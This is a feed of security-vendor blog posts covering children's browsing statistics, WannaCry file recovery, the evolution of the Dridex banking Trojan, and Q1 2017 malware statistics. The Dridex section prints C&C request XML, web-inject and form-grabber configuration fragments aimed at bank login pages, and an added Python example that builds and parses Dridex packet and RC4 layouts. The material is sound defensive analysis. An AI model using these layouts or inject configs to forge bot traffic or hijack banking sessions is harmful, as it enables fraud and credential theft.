The UK (37.56%) comes first among all countries where this category is popular, followed by Canada (34.32%) and the USA (31.92%). We suppose that the high popularity may be connected to children frequently being exposed to scenes of smoking or drinking, for example in films, and wanting to learn more about the topic online. The situation is the same with drugs, especially with marijuana having been legalized in some U.S. states.

Last year, we noticed a trend of frequent events triggered for this dangerous topic and explained it as the topic of alcohol, tobacco, and drugs being a part of teenage culture owing to coverage in blogs, films, and music. Also, last year, an “alternative” to smoking became extremely popular among teenagers. This is so-called “vaping”, which utilizes electronic devices to inhale vapor with different flavors.

To this day, the effect of vaping on the human body has not been fully studied, so we decided not to leave it out of the “Alcohol, tobacco, narcotics” category. As a result, the category was expanded to include “vaping”, and the overall number of triggered events increased, which is reflected in the statistics.

Computer games

Games are an integral part of everyone’s childhood. It’s not just children who are interested – many adults enjoy computer games too. With total immersion in a game, a person not only devotes himself or herself to the gaming process but also takes an interest in various mods, codes, and walkthroughs online.

The Popularity of the “Computer Games” Category in Various Countries, May 2016–May 2017

Children in Great Britain (26.43%), Canada (24.95%), Australia (19.60%), and the USA (19.11%) are the ones most interested in computer games. In Egypt (1.66%), Saudi Arabia (3.59%), and Italy (4.97%), children prefer social networks to gaming on the computer.

To get the full picture of what gaming websites children are interested in globally, we have taken the most popular gaming websites (according to data from our users) and checked which ones are popular in which region.

The Percentage Breakdown of Gaming Website Popularity in Different Regions, May 2016–May 2017

It turned out that in all regions except the CIS and Asian countries, the Roblox website is the gaming site children visit most often. Roblox is a massively multiplayer online role-playing game (MMORPG). Uncontrolled passion for such games may lead to fatigue, difficulty in socializing and psychological problems. However, MMORPGs are diverse, and Roblox, like the well-known Minecraft, may benefit a child's creative thinking and imagination. Nevertheless, no matter how good a game is at educating, a parent should manage the time a child spends on games to prevent addiction.

In the CIS and Asian countries, the most visited website related to computer games turned out to be Steam, which is a large online store, a gaming community and a client for personal computers. The client lets the user download and launch games, write reviews, trade trading cards and so on. The statistics do not include interaction with the Steam client itself, so the real popularity of Steam is probably higher. The problem is that a child can use Steam to play any game, including those unsuitable for children. On the other hand, we have high hopes for the popularity of Roblox and Minecraft; the latter is even used in the school systems of several countries.

Software, audio, video

This category includes websites that allow users to listen to music, watch films online, and watch videos on YouTube. The category also includes websites that store various applications, torrents, and much more.

The Popularity of the “Software, Audio, Video” Category in Various Countries, May 2016–May 2017

Children from China spend much more time watching videos and listening to music. In China, the most visited website from this category is (a service for listening to music online).

YouTube, just like last year, is the most visited website in the world from this category. In Western countries, Netflix is very popular (it is a movie and TV-show provider). In the CIS countries, popularity is still there for websites that allow users to watch films and cartoons online for free, which is a gray area of legality, and torrent trackers, which are not always safe, as it is possible to download malicious applications along with a film or pirated game.

As for websites like YouTube, we should not assume that these are absolutely safe for children.

Electronic commerce

Each year, there is an increasing number of traditional shops opening their online offices; there are also many stores that exist only online. What could be easier than choosing an item you want and paying for it with a couple of clicks without even having to get up from the couch? Children from many countries think the same way.

The Popularity of the “Electronic Commerce” Category in Various Countries, May 2016–May 2017

Children from China (15.44%) and Japan (13.93%) are interested in online purchases more often than their peers from other countries. Their favorite websites are,, and the Japanese eBay is very popular among the children from Europe and the USA. All of the aforementioned websites are Internet markets where it is possible to buy virtually anything.

We certainly recommend that parents monitor the activity of their accounts in online stores and log out of them after completing purchases. The point is that many online stores have a feature to save bank card data in the account section so that a user does not have to reenter them. Thus, anyone who logs into an online store by using an account with saved bank card data can pay for any order with two clicks without having any information about the card. To prevent this from happening, a parent should always either log out of the online-store account and not save the password in the browser, or delete (or not confirm saving) bank card data after each purchase. Generally, it is recommended to have two different accounts in an operating system so that a parent’s data (passwords to websites, web-browser history, or bank card data) do not get into the hands of their child.

Adult content

To conclude our report, we are going to review the “Adult content” category. On the whole, the task of protecting children from adult topics, for instance, from the topic of sex, has never lost its relevance. With the appearance of the Internet, a variety of erotic and pornographic content became more accessible than ever before; children understand this. However, it is hard to imagine a child spending all day long browsing pornographic websites. Thus, the resulting percentage of the “Adult content” category is not so high.

The Popularity of the “Adult Content” Category in Various Countries, May 2016–May 2017

According to our data, adult content has been becoming less popular among children. But, as we warned in an analytical article last year, we should not assume that children have started visiting pornographic websites less often. It might be possible that they are doing it more frequently from mobile devices.

In China (8.82%) and Japan (5.66%), children show a substantially higher interest in adult content compared to other countries and regions. This might be due to erotic and pornographic comics and cartoons being extremely popular in Asia. For example, there are large stores in Japan that sell relevant products. Children from Saudi Arabia (0.23%) and the Emirates (0.16%) are the least interested in pornography. This might be because of the stringent cultural traditions of the Arab community.


Our statistics show that websites visited from a personal computer by a child depend upon the development of the regional Internet infrastructure at the place of residence, the financial abilities of the parents, and cultural peculiarities.

This is not the first year where there is a tendency for growth in the popularity of smartphones and tablets. Today, almost every child who has access to a tablet or a smartphone from an early age can handle it better than a personal computer. This indicates that both developers of applications that protect children online and parents themselves should not fall behind on the technological development of their children.

However, parents should not rely on technical means alone: they should not only manage how long their child spends online but work on developing digital literacy for themselves and their child. Parents should also build trust-based relationships with their child. After all, if he or she is scolded for being on social networks, then the child will be too afraid to turn to his or her parents for help if a dangerous situation occurs and the child will be left alone with his or her problem.

WannaCry mistakes that can help you restore files after infection

Thu, 06/01/2017 - 03:00

Sometimes ransomware developers make mistakes in their code. These mistakes could help victims regain access to their original files after a ransomware infection. This article is a short description of several errors, which were made by the WannaCry ransomware developers.

Errors in file removal logic

When WannaCry encrypts a victim's file, it reads the original, encrypts the content and saves it to a file with the extension “.WNCRYT”. After encryption it renames “.WNCRYT” to “.WNCRY” and deletes the original file. This deletion logic varies depending on the location and properties of the victim's files.

The files are located on the system drive:
  • If the file is in an ‘important’ folder (from the malware developers’ point of view – e.g. Desktop and Documents), then the original file is overwritten with random data before removal. In this case, unfortunately, there is no way to restore the original file content.
  • If the file is stored outside of ‘important’ folders, then the original file is moved to %TEMP%\%d.WNCRYT (where %d denotes a numeric value). These files contain the original data and are not overwritten; they are simply deleted from the disk, which means there is a high chance they can be restored using data recovery software.

Renamed original files that can be restored from %TEMP%

The files are located on other (non-system) drives:
  • The ransomware creates a “$RECYCLE” folder and sets the hidden+system attributes on it, which makes the folder invisible in Windows File Explorer with its default configuration. The malware intends to move the original files into this directory after encryption.

The procedure that determines the temporary directory to store original files before removal

  • However, because of synchronization errors in the ransomware code, in many cases the original files stay in the same directory and are not moved into $RECYCLE.
  • The original files are deleted in an insecure way, which makes it possible to restore them using data recovery software.

Original files that can be restored from a non-system drive

The procedure that constructs the temporary path for an original file

The piece of code calling the above procedures

Read-only files processing error

While analysing WannaCry, we also discovered that this ransomware has a bug in its read-only file processing. If there are such files on the infected machine, then the ransomware won’t encrypt them at all. It will only create an encrypted copy of each original file, while the original files themselves only get the “hidden” attribute. When this happens, it is simple to find them and restore their normal attributes.

Original read-only files are not encrypted and stay in the same place
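As an added example (not code from the article and not a Kaspersky Lab utility), the Python script below turns the three observations above into a read-only scan: %d.WNCRYT files still present in %TEMP%, $RECYCLE folders on non-system drives, and originals sitting next to their .WNCRY copy because the read-only bug left them hidden but unencrypted. It lists only what still exists on disk; originals the ransomware already deleted must be carved with data recovery software, as the article says. The directory tree built by build_sample_tree() is constructed sample data; on a real machine point the functions at %TEMP%, the drive roots and the user profile.

```python
"""Scan for WannaCry leftovers that are still recoverable.

Added example, not code from the article and not a Kaspersky Lab tool. It turns
the three observations above into a read-only scan:
  1. %TEMP%\\<number>.WNCRYT         - originals renamed out of non-'important' folders
  2. $RECYCLE on non-system drives   - hidden+system folder the originals were meant to go to
  3. <name> beside <name>.WNCRY      - read-only originals that were only hidden, never encrypted
The layout built by build_sample_tree() is constructed for the demo.
"""
import os
import re
import shutil
import sys
import tempfile

RENAMED_ORIGINAL = re.compile(r"^\d+\.WNCRYT$", re.IGNORECASE)
ENCRYPTED_SUFFIX = ".WNCRY"


def renamed_originals(temp_dir):
    """%d.WNCRYT files in the temp directory (observation 1); deleted, not overwritten, by the malware."""
    if not os.path.isdir(temp_dir):
        return []
    return sorted(os.path.join(temp_dir, n) for n in os.listdir(temp_dir)
                  if RENAMED_ORIGINAL.match(n))


def recycle_dirs(drive_roots):
    """$RECYCLE folders created by the ransomware on non-system drives (observation 2)."""
    found = []
    for root in drive_roots:
        candidate = os.path.join(root, "$RECYCLE")
        if os.path.isdir(candidate):
            found.append(candidate)
    return found


def untouched_readonly_originals(root):
    """Originals that still sit next to their .WNCRY copy (observation 3)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        names = set(files)
        for n in files:
            if n.upper().endswith(ENCRYPTED_SUFFIX) and n[:-len(ENCRYPTED_SUFFIX)] in names:
                found.append(os.path.join(dirpath, n[:-len(ENCRYPTED_SUFFIX)]))
    return sorted(found)


def unhide(path):
    """Clear the hidden attribute WannaCry set on a read-only original (Windows only, else no-op)."""
    if sys.platform != "win32":
        return False
    import ctypes
    hidden = 0x2  # FILE_ATTRIBUTE_HIDDEN
    attrs = ctypes.windll.kernel32.GetFileAttributesW(path)
    if attrs == -1:  # INVALID_FILE_ATTRIBUTES
        return False
    return bool(ctypes.windll.kernel32.SetFileAttributesW(path, attrs & ~hidden))


def _touch(path):
    with open(path, "wb") as fh:
        fh.write(b"sample")


def build_sample_tree():
    """Constructed post-infection layout (sample data for the demo); returns its root."""
    root = tempfile.mkdtemp(prefix="wncry_demo_")
    temp, docs, drive_d = (os.path.join(root, p) for p in ("TEMP", "Documents", "D"))
    os.makedirs(temp)
    os.makedirs(docs)
    os.makedirs(os.path.join(drive_d, "$RECYCLE"))
    for name in ("1.WNCRYT", "2.WNCRYT", "notes.txt.WNCRY"):  # renamed originals + one encrypted file
        _touch(os.path.join(temp, name))
    for name in ("budget.xlsx", "budget.xlsx.WNCRY", "photo.jpg.WNCRY"):  # read-only original survived
        _touch(os.path.join(docs, name))
    return root


def demo():
    """Run the scan over the constructed tree and report base names only."""
    root = build_sample_tree()
    try:
        return {
            "renamed": [os.path.basename(p) for p in renamed_originals(os.path.join(root, "TEMP"))],
            "recycle": [os.path.basename(p) for p in recycle_dirs([os.path.join(root, "D")])],
            "readonly": [os.path.basename(p) for p in untouched_readonly_originals(root)],
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    print(demo())
```

The scan itself never writes to the affected volume, and unhide() should only be run once the recovery pass is finished: every write to the disk reduces the chance that data recovery software can still carve the deleted originals.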


From our in depth research into this ransomware, it is clear that the ransomware developers have made a lot of mistakes and, as we pointed out, the code quality is very low.

If you were infected with WannaCry ransomware there is a good possibility that you will be able to restore a lot of the files on the affected computer. To restore files, you can use the free utilities available for file recovery. We advise organizations share this article with their system administrators – as they can use the file recovery utilities on affected machines in their network.

Dridex: A History of Evolution

Thu, 05/25/2017 - 09:56

The Dridex banking Trojan, which has become a major financial cyberthreat in the past years (in 2015, the damage done by the Trojan was estimated at over $40 million), stands apart from other malware because it has continually evolved and become more sophisticated since it made its first appearance in 2011. Dridex has been able to escape justice for so long by hiding its main command-and-control (C&C) servers behind proxying layers. Given that old versions stop working when new ones appear and that each new improvement is one more step forward in the systematic development of the malware, it can be concluded that the same people have been involved in the Trojan’s development this entire time. Below we provide a brief overview of the Trojan’s evolution over six years, as well as some technical details on its latest versions.

How It All Began

Dridex made its first appearance as an independent malicious program (under the name “Cridex”) around September 2011. An analysis of a Cridex sample (MD5: 78cc821b5acfc017c855bc7060479f84) demonstrated that, even in its early days, the malware could receive dynamic configuration files, use web injections to steal money, and was able to infect USB media. This ability influenced the name under which the “zero” version of Cridex was detected — Worm.Win32.Cridex.

That version had a binary configuration file:

Sections named databefore, datainject, and dataafter made the web injections themselves look similar to the widespread Zeus malware (there may have been a connection between this and the 2011 Zeus source code leak).

Cridex 0.77–0.80

In 2012, a significantly modified Cridex variant (MD5: 45ceacdc333a6a49ef23ad87196f375f) was released. The cybercriminals had dropped functionality related to infecting USB media and replaced the binary format of the configuration file and packets with XML. Requests sent by the malware to the C&C server looked as follows:

<message set_hash="" req_set="1" req_upd="1">
  <header>
    <unique>WIN-1DUOM1MNS4F_A47E8EE5C9037AFE</unique>
    <version>600</version>
    <system>221440</system>
    <network>10</network>
  </header>
  <data></data>
</message>

The <message> tag was the XML root element. The <header> tag contained information about the system, bot identifier, and the version of the bot.

Here is a sample configuration file:

<packet>
  <commands>
    <cmd id="1354" type="3">
      <httpinject>
        <conditions>
          <url type="deny">\.(css|js)($|\?)</url>
          <url type="allow" contentType="^text/(html|plain)"><![CDATA[https://.*?\.usbank\.com/]]></url>
        </conditions>
        <actions>
          <modify>
            <pattern><![CDATA[<body.*?>(.*?)]]></pattern>
            <replacement><![CDATA[<link href="" rel="stylesheet" type="text/css"/> <style type="text/css"> .ui-dialog-titlebar{ background: white } .text1a{font-family: Arial; font-size: 10px;}

With the exception of the root element <packet>, the Dridex 0.8 configuration file remained virtually unchanged until version 3.0.

Dridex 1.10

The “zero” version was maintained until June 2014. A major operation (Operation Tovar) to take down another widespread malicious program — Gameover Zeus — was carried out that month. Nearly as soon as Zeus was taken down, the “zero” version of Cridex stopped working and Dridex version 1.100 appeared almost exactly one month afterward (on June 22).

Sample configuration file:

<root>
  <settings hash="65762ae2bf50e54757163e60efacbe144de96aca">
    <httpshots>
      <url type="deny" onget="1" onpost="1">\.(gif|png|jpg|css|swf|ico|js)($|\?)</url>
      <url type="deny" onget="1" onpost="1">(resource\.axd|yimg\.com)</url>
    </httpshots>
    <formgrabber>
      <url type="deny">\.(swf)($|\?)</url>
      <url type="deny">/isapi/ocget.dll</url>
      <url type="allow">^https?://*/login/</url>
      <url type="allow">^https?://</url>
      <url type="allow">^https?://</url>
      ...
    <redirects>
      <redirect name="1st" vnc="0" socks="0" uri="" timeout="20">twister5.js</redirect>
      <redirect name="2nd" vnc="1" socks="1" uri="" timeout="20">mainsc5.js</redirect>
      <redirect name="vbv1" vnc="0" socks="0" postfwd="1" uri="" timeout="20">/logs/dtukvbv/js.php</redirect>
      <redirect name="vbv2" vnc="0" socks="0" postfwd="1" uri="" timeout="20">/logs/dtukvbv/in.php</redirect>
    </redirects>
    <httpinjects>
      <httpinject>
        <conditions>
          <url type="allow" onpost="1" onget="1" modifiers="U"><![CDATA[^https\://.*/tdsecure/intro\.jsp.*]]></url>
          <url type="deny" onpost="0" onget="1" modifiers="">\.(gif|png|jpg|css|swf)($|\?)</url>
        </conditions>
        <actions>
          <modify><pattern modifiers="msU"><![CDATA[onKeyDown\=".*"]]></pattern><replacement><![CDATA[onKeyDown=""]]></replacement></modify>
          <modify><pattern modifiers="msU"><![CDATA[(\<head.*\>)]]></pattern><replacement><![CDATA[\1<style type="text/css"> body {visibility: hidden; } </style>
          ...

This sample already has redirects for injected .js scripts that are characteristic of Dridex.

Here is a comparison between Dridex and Gameover Zeus injections:

Thus, the takedown of one popular botnet (Gameover Zeus) led to a breakthrough in the development of another, which had many strong resemblances to its predecessor.

By this version Dridex had begun to use the PCRE regular expression library for its injection patterns (note the PCRE-style modifiers attributes in the configuration file above), while its previous versions used SLRE. Remarkably, the only other banking malware that also used SLRE was Trojan-Banker.Win32.Shifu. That Trojan was discovered in August 2015 and was distributed through spam via the same botnets as Dridex. Additionally, both banking Trojans used XML configuration files.

We also have reasons to believe that, at least in 2014, the cybercriminals behind Dridex were Russian speakers. This is supported by comments in the command & control server’s source code:

And by the database dumps:

Dridex: from Version 2 to Version 3

By early 2015, Dridex implemented a kind of P2P network, which is also reminiscent of the Gameover Zeus Trojan. On that network, some peers (supernodes) had access to the C&C and forwarded requests from other network nodes to it. The configuration file was still stored in XML format, but it got a new section, <nodes>, which contained an up-to-date peer list. Additionally, the protocol used for communication with the C&C was encrypted.

Dridex: from Version 3 to Version 4

One of the administrators of the Dridex network was arrested on August 28, 2015. In the early days of September, networks with identifiers 120, 200, and 220 went offline. However, they came back online in October and new networks were added: 121, 122, 123, 301, 302, and 303.

Notably, the cybercriminals stepped up security measures at that time. Specifically, they introduced geo-filtering wherein an IP field appeared in C&C request packets, which was then used to identify the peer’s country. If it was not on the list of target countries, the peer received an error message.

In 2016, the loader became more complicated and encryption methods were changed. A binary loader protocol was introduced, along with a <settings> section, which contained the configuration file in binary format.

Dridex 4.x. Back to the Future

The fourth version of Dridex was detected in early 2017. It has capabilities similar to the third version, but the cybercriminals stopped using the XML format in the configuration file and packets and went back to binary. The analysis of new samples is rendered significantly more difficult by the fact that the loader now works for two days, at most. This is similar to Lurk, except that Lurk’s loader was only active for a couple of hours.

Analyzing the Loader’s Packets

The packet structure in the fourth version is similar to those in the late modifications of the loader’s 3.x versions. However, the names of the modules requested have been replaced with hashes:

Here is the function that implements C&C communication and uses these hashes:

Knowing the packet structure in the previous version, one can guess which hash relates to which module by comparing packets from the third and fourth versions.

In the fourth version of Dridex, there are many places where the CRC32 hashing algorithm is used, including hashes used to search for function APIs and to check packet integrity. It would make sense for hashes used in packets to be none other than CRC32 of requested module names. This assumption can easily be verified by running the following Python code:

That’s right – the hashes obtained this way are the same as those in the program’s code.
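The check described above, as an added example in Python (the article's own snippet is not reproduced in this feed, and this is neither that snippet nor Dridex code): a table-driven CRC-32 that matches zlib.crc32, a wordlist of candidate module names hashed with it, and a resolver that maps hashes seen in a packet back to names. The candidate names are a constructed wordlist, and the hashes Dridex 4 actually sends are not listed on this page. The UTF-16 variant is an assumption: the page does not say which string form Dridex hashes, so both are tried.

```python
"""Map CRC32 hashes back to the module names they were computed from.

Added example, not the article's snippet and not Dridex code. It implements the
standard reflected CRC-32 (same result as zlib.crc32), hashes a constructed
wordlist of candidate names and resolves unknown hashes against it.
"""
import zlib

CRC32_POLY = 0xEDB88320  # reflected form of 0x04C11DB7


def _build_table():
    table = []
    for n in range(256):
        c = n
        for _ in range(8):
            c = (c >> 1) ^ CRC32_POLY if c & 1 else c >> 1
        table.append(c)
    return table


_TABLE = _build_table()


def crc32(data: bytes) -> int:
    """CRC-32/ISO-HDLC: init 0xFFFFFFFF, reflected, final XOR 0xFFFFFFFF (identical to zlib.crc32)."""
    c = 0xFFFFFFFF
    for b in data:
        c = _TABLE[(c ^ b) & 0xFF] ^ (c >> 8)
    return c ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Cross-check the hand-rolled routine against the C implementation."""
    return crc32(data) == (zlib.crc32(data) & 0xFFFFFFFF)


def hash_wordlist(names, encodings=("ascii", "utf-16-le")):
    """hash -> name. Hashing the UTF-16 form is common in Windows malware, so it is tried too
    (an assumption here; the page does not say which form Dridex hashes)."""
    table = {}
    for name in names:
        for enc in encodings:
            table.setdefault(crc32(name.encode(enc)), name)
    return table


def resolve(hashes, names):
    """Return {hash: name or None} for each hash seen in a packet."""
    table = hash_wordlist(names)
    return {h: table.get(h) for h in hashes}


# Constructed wordlist of plausible loader module names (not taken from the page).
CANDIDATE_MODULES = ["vnc", "socks", "pony", "spammer", "bot", "loader"]

if __name__ == "__main__":
    seen = [crc32(b"socks"), crc32("vnc".encode("utf-16-le")), 0x12345678]
    for h, name in resolve(seen, CANDIDATE_MODULES).items():
        print(f"{h:08x} -> {name}")
```

If a hash from a real packet does not resolve, the first thing to vary is the CRC parameters (initial value, final XOR, or a non-reflected table), since malware authors sometimes tweak them; the second is the wordlist, which should include the module names known from the 3.x loader protocol.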

With regards to encryption of the loader’s packets, nothing has changed. As in Dridex version 3, the RC4 algorithm is used, with a key stored in encrypted form in the malicious program’s body.

One more change introduced in the fourth version is that a much stricter loader authorization protocol is now used. A loader’s lifespan has been reduced to one day, after which encryption keys are changed and old loaders become useless. The server responds to requests from all outdated samples with error 404.

Analysis of the Bot’s Protocol and Encryption

Essentially, the communication of Dridex version 4 with its C&C is based on the same procedure as before, with peers still acting as proxy servers and exchanging modules. However, encryption and packet structure have changed significantly; now a packet looks like the <settings> section from the previous Dridex version. No more XML.

The Basic Packet Generation function is used to create packets for communication with the C&C and with peers. There are two types of packets for the C&C:

  1. Registration and transfer of the generated public key
  2. Request for a configuration file

The function outputs the following packet:

A packet begins with the length of the RC4 key (74h) that is used to encrypt strings in the packet. It is followed by two blocks of that size; XORing them yields the actual key. Next come the packet type (00h) and the encrypted bot identifier.

Peer-to-Peer Encryption

Sample encrypted P2P packet:

The header of a P2P packet is a DWORD array, the sum of all elements in which is zero. The obfuscated data size is the same as in the previous version, but the data is encrypted differently:

The packet begins with a 16-byte key, followed by 4 bytes of information about the size of data encrypted with the previous key using RC4. Next comes a 16-byte key and data that has been encrypted with that key using RC4. After decryption we get a packet compressed with gzip.

Peer to C&C Encryption

As before, the malware uses a combination of RSA, RC4 encryption, and HTTPS to communicate with the C&C. In this case, peers work as proxy servers. An encrypted packet has the following structure: 4-byte CRC, followed by RSA_BLOB. After decrypting RSA (request packets cannot be decrypted without the C&C private key), we get a GZIP packet.

Configuration File

We have managed to obtain and decrypt the configuration file of botnet 222:

It is very similar in structure to the <settings> section from the previous version of Dridex. It begins with a 4-byte hash, which is followed by the configuration file’s sections.

struct DridexConfigSection {
    BYTE  SectionType;
    DWORD DataSize;
    BYTE  Data[DataSize];
};

The sections are of the same types as in <settings>:

  • 01h – HttpShots
  • 02h – Formgrabber
  • 08h – Redirects
  • etc.

The only thing that has changed is the encryption of strings in the configuration file – RC4 is now used.

struct EncryptedConfigString {
    BYTE  RC4Key1[16];         // Size's encryption key
    DWORD EncryptedSize;
    BYTE  RC4Key2[16];         // Data's encryption key
    BYTE  EncryptedData[Size];
};

RC4 was also used to encrypt data in p2p packets.
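The basic packet layout (key length, two XORed key halves, type, encrypted bot id), the P2P packet body and EncryptedConfigString (16-byte key, RC4-encrypted size, 16-byte key, RC4-encrypted data, gzip inside for P2P), the zero-sum DWORD header and DridexConfigSection, all described above, as one added example in Python. It is not Dridex code, not a Kaspersky tool and not the page's own snippet. Assumptions not stated on the page: the key-length field is a single byte and each key half is that many bytes, sizes are little-endian DWORDs, and the P2P header is four DWORDs. Every key and payload is a constructed sample value; the bot identifier is reused from the XML sample earlier only as a string.

```python
"""Build and parse the Dridex 4 byte layouts described above.

Added example, not Dridex code and not Kaspersky tooling. Assumptions: one-byte
key-length field with each key half that long, little-endian sizes, four-DWORD
P2P header. Keys and payloads below are constructed samples.
"""
import gzip
import struct


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4; encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for b in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(b ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


# --- basic packet: len | half1 | half2 | type | rc4(half1 ^ half2, bot_id) ---
def build_basic_packet(half1: bytes, half2: bytes, packet_type: int, bot_id: bytes) -> bytes:
    if len(half1) != len(half2):
        raise ValueError("key halves must be the same size")
    key = xor_bytes(half1, half2)
    return bytes([len(half1)]) + half1 + half2 + bytes([packet_type]) + rc4(key, bot_id)


def parse_basic_packet(pkt: bytes):
    n = pkt[0]
    key = xor_bytes(pkt[1:1 + n], pkt[1 + n:1 + 2 * n])
    packet_type = pkt[1 + 2 * n]
    return packet_type, rc4(key, pkt[2 + 2 * n:])


# --- EncryptedConfigString / P2P body: key1[16] | rc4(key1, size) | key2[16] | rc4(key2, data) ---
def pack_encrypted_string(data: bytes, key1: bytes, key2: bytes) -> bytes:
    if len(key1) != 16 or len(key2) != 16:
        raise ValueError("RC4 keys are 16 bytes in this layout")
    return key1 + rc4(key1, struct.pack("<I", len(data))) + key2 + rc4(key2, data)


def unpack_encrypted_string(buf: bytes, offset: int = 0):
    """Return (plaintext, offset just past the string) so strings can be read back to back."""
    key1 = buf[offset:offset + 16]
    size = struct.unpack("<I", rc4(key1, buf[offset + 16:offset + 20]))[0]
    key2 = buf[offset + 20:offset + 36]
    start = offset + 36
    return rc4(key2, buf[start:start + size]), start + size


def encode_p2p_body(payload: bytes, key1: bytes, key2: bytes) -> bytes:
    """P2P data is gzip-compressed before the RC4 layer."""
    return pack_encrypted_string(gzip.compress(payload), key1, key2)


def decode_p2p_body(buf: bytes) -> bytes:
    packed, _ = unpack_encrypted_string(buf)
    return gzip.decompress(packed)


def p2p_header_ok(dwords) -> bool:
    """The header DWORD array must sum to zero modulo 2**32."""
    return (sum(dwords) & 0xFFFFFFFF) == 0


def make_p2p_header(count: int = 4, seed: int = 0x11223344):
    """Fill count-1 DWORDs and choose the last so the 32-bit sum wraps to zero."""
    dwords = [(seed * (i + 1)) & 0xFFFFFFFF for i in range(count - 1)]
    dwords.append((-sum(dwords)) & 0xFFFFFFFF)
    return dwords


# --- configuration blob: hash[4] | (type[1] | size[4] | data[size])* ---
def build_config(cfg_hash: int, sections) -> bytes:
    out = struct.pack("<I", cfg_hash)
    for section_type, data in sections:
        out += bytes([section_type]) + struct.pack("<I", len(data)) + data
    return out


def parse_config_sections(blob: bytes):
    pos, sections = 4, []
    while pos < len(blob):
        section_type = blob[pos]
        size = struct.unpack_from("<I", blob, pos + 1)[0]
        sections.append((section_type, blob[pos + 5:pos + 5 + size]))
        pos += 5 + size
    return sections
```

The XOR-derived key only protects the strings inside the basic packet; transport protection is the separate RC4/gzip (peer) or RSA/gzip (C&C) layer described above, and only the RSA layer needs key material that is not in the capture. In practice the section data of a decrypted configuration is itself a run of EncryptedConfigString records, which is why unpack_encrypted_string() returns the next offset.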

Geographical Distribution

The developers of Dridex look for potential victims in Europe. Between January 1st and early April 2017, we detected Dridex activity in several European countries. The UK accounted for more than half (nearly 60%) of all detections, followed by Germany and France. At the same time, the malware never works in Russia, as the C&Cs detect the country via IP address and do not respond if the country is Russia.


In the several years that the Dridex family has existed, there have been numerous unsuccessful attempts to block the botnet’s activity. The ongoing evolution of the malware demonstrates that the cybercriminals are not about to bid farewell to their brainchild, which is providing them with a steady revenue stream. For example, Dridex developers continue to implement new techniques for bypassing User Account Control (UAC). These techniques let the malware run its components with elevated privileges on Windows systems without the user seeing a UAC prompt.

It can be surmised that the same people, possibly Russian speakers, are behind the Dridex and Zeus Gameover Trojans, but we do not know this for a fact. The damage done by the cybercriminals is also impossible to assess accurately. Based on a very rough estimate, it has reached hundreds of millions of dollars by now. Furthermore, given the way that the malware is evolving, it can be assumed that a significant part of the “earnings” is reinvested into the banking Trojan’s development.

The analysis was performed based on the following samples:

Dridex4 loader: d0aa5b4dd8163eccf7c1cd84f5723d48
Dridex4 bot: ed8cdd9c6dd5a221f473ecf3a8f39933

IT threat evolution Q1 2017. Statistics

Mon, 05/22/2017 - 05:03

Q1 figures

According to KSN data, Kaspersky Lab solutions detected and repelled 479,528,279 malicious attacks from online resources located in 190 countries all over the world.

79,209,775 unique URLs were recognized as malicious by web antivirus components.

Attempted infections by malware that aims to steal money via online access to bank accounts were registered on 288 thousand user computers.

Crypto ransomware attacks were blocked on 240,799 computers of unique users.

Kaspersky Lab’s file antivirus detected a total of 174,989,956 unique malicious and potentially unwanted objects.

Kaspersky Lab mobile security products detected:

  • 1,333,605 malicious installation packages;
  • 32,038 mobile banker Trojans (installation packages);
  • 218,625 mobile ransomware Trojans (installation packages).
Mobile threats

Q1 events

The rise of Trojan-Ransom.AndroidOS.Egat

In the first quarter of 2017, we registered a dramatic growth in attacks involving mobile ransomware from the Trojan-Ransom.AndroidOS.Egat family: the number of users attacked by this type of malware increased more than 13 times from the previous quarter. Despite this Trojan being known to us since June 2016, such an explosive increase in the number of attacks has only occurred now.

This malware has standard mobile ransomware functionality: it blocks the device, overlays all open windows with its own window, then demands money to unblock the device. In most cases, the ransom amount fluctuates between $100 and $200. Most of the attacked users were in Europe, mainly Germany, the UK and Italy.

Revamped ZTorg

We managed to detect around 30 new Trojans from the Ztorg family in the official Google Play Store. To recap, this is the family that gave us infected fake guides for Pokémon GO. It was discovered in Google Play in the summer of 2016 and was installed more than 500,000 times. After installation, Ztorg checks to make sure it isn’t running on a virtual machine. If the check is passed smoothly, the main module is loaded from a remote server. By exploiting a vulnerability in the system, the Trojan tries to gain superuser privileges. If successful, it installs its modules into the system folders and also modifies the device settings so that it remains there – even after a reset to factory settings.

Trojan.AndroidOS.Ztorg.bp in the official Google Play Store

The Trojan uses several different modules that secretly download and install various programs on the device, display ads and even buy apps. It should be noted that the functionality of this malware has changed a bit: the number of checks to verify whether the device is real has decreased; the code for downloading, decrypting and loading the main module has been placed in a downloaded library.

Asacub awakens

In the first quarter of 2017, we noted that the Trojan-Banker.AndroidOS.Asacub mobile banker was actively spreading. Over three months, the representatives of this family attacked more than 43,000 mobile devices, which was 2.5 times more than in the previous quarter. Over 97% of all attacked users were in Russia. Asacub was mainly distributed via SMS spam. After clicking a malicious link, users were directed to a page where they were prompted to view an MMS that concealed the Trojan, which was then downloaded to the device. Interestingly, if the same link was opened on a Windows device, was downloaded.

The site from which Trojan-Banker.AndroidOS.Asacub was downloaded

It’s worth noting that Trojan-Banker.AndroidOS.Asacub is constantly expanding its spyware functionality. In addition to the standard mobile banker features, such as stealing and sending text messages, or overlaying various applications with phishing windows, this Trojan hunts for the user’s call history, contacts and GPS location.

Mobile threat statistics

In the first quarter of 2017, Kaspersky Lab detected 1,333,605 malicious installation packages, which is almost as many as in Q4 2016.

Number of detected malicious installation packages (Q2 2016 – Q1 2017)

Distribution of mobile malware by type

Distribution of new mobile malware by type (Q4 2016 and Q1 2017)

In Q1 2017, the biggest growth was in Trojan-Ransom: its share increased from 4.64% to 16.42%, i.e. 3.5 times. The fastest growth in the number of installation packages was shown by the Trojan-Ransom.AndroidOS.Congur family, which is described below.

